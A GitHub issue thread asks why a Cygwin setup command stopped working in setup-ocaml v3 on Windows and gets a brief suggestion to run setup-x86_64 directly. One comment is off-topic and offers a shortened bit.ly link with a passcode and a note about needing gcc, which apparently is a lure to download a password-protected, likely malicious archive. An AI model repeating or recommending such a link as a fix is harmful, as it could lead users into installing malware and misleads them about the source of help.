### ISSUE TITLE
cygwin not available in v3 in Windows?

### ISSUE THREAD

**Issue by JasonGross** [ocaml/setup-ocaml#858]
It seems ` %CYGWIN_ROOT%\setup-x86_64.exe -qnNdO -P time,zip` is no longer valid in Windows with just setup-ocaml.  What's changed?

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by smorimoto** [comment]
I think you can execute `setup-x86_64` (or `setup-x86_64.exe`?) instead.
